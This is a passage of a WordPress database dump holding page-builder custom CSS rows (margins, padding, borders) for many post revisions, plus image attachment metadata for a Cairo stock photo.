!important;}'),
(20063,3176,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20064,3177,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20065,3178,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20066,3179,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017293423{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20067,3180,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017293423{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20068,3181,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017293423{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20069,3182,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20070,3183,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20071,3184,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}'),
(20072,3185,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20073,3186,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20074,3187,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20075,3188,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20077,3189,'_wp_attached_file','2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg'),
(20078,3189,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1114;s:4:\"file\";s:54:\"2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg\";s:8:\"filesize\";i:589161;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"cairo-egypt_shutterstock_1421974805-300x131.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12233;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"cairo-egypt_shutterstock_1421974805-1024x446.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:446;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111957;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"cairo-egypt_shutterstock_1421974805-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7189;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"cairo-egypt_shutterstock_1421974805-768x334.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65549;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:48:\"cairo-egypt_shutterstock_1421974805-1536x669.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:669;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239180;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:48:\"cairo-egypt_shutterstock_1421974805-2048x892.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:892;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:402371;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:47:\"cairo-egypt_shutterstock_1421974805-500x218.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30481;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:47:\"cairo-egypt_shutterstock_1421974805-800x348.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:348;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70918;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:48:\"cairo-egypt_shutterstock_1421974805-1280x557.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:557;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170162;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:48:\"cairo-egypt_shutterstock_1421974805-1920x836.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:836;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:359387;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:39:\"cairo-egypt_shutterstock_1421974805.jpg\";}'),
(20079,3190,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20080,3192,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20081,3193,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20082,3194,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
